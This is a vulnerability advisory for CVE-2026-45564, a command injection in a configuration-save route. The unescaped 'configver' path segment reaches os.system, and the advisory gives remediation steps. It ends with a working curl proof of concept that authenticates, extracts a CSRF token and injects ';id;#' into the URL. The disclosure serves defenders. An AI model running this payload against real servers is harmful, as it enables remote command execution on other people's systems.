CVE-2026-45564

An authenticated user with a role of 'user' (level 3) can exploit this vulnerability. The attacker crafts a POST request to `/config/versions/<service>/<server_ip>/<configver>/save`. By including shell metacharacters within the `configver` URL path segment, such as `;id;#`, the attacker can inject and execute arbitrary commands. This occurs because `configver` is not properly escaped before being passed to `os.system` [ref_id=1].

The vulnerability lies within the `save_version` function in `app/routes/config/routes.py` and the subsequent call to `os.system` in `app/modules/config/config.py`. Specifically, the `configver` parameter from the URL is concatenated with `config_dir` and then passed to `os.system(f"dos2unix -q {cfg}")` without adequate validation or escaping [ref_id=1].

The advisory indicates that no patches are publicly available at the time of publication. However, it suggests a remediation strategy that involves validating the `configver` input against a regular expression to ensure it only contains safe characters. Additionally, the path should be resolved to its real path and checked to ensure it remains within the intended configuration directory. Finally, the command execution should be changed from `os.system` to `subprocess.run` to pass the path as an argument rather than through a shell [ref_id=1].

# Authenticate (role <= 3 sufficient). curl -sc /tmp/u.jar -X POST http://victim.example/login \ -H 'Content-Type: application/json' \ -d '{"login":"editor","pass":"editor"}'

# Trigger RCE via shell metacharacters in configver. URL-encoded: curl -sb /tmp/u.jar -X POST \ "http://victim.example/config/versions/haproxy/127.0.0.1/x;id;%23/save" \ -H "X-CSRF-TOKEN: $(awk '/csrf_access_token/{print $7}' /tmp/u.jar)" \ -H 'Content-Type: application/json' \ -d '{"action":"save"}' The attacker-controlled configver = x;id;# lands at os.system(f"dos2unix -q {config_dir}x;id;#") → bash splits on ; → runs id and discards the trailing comment. [ref_id=1]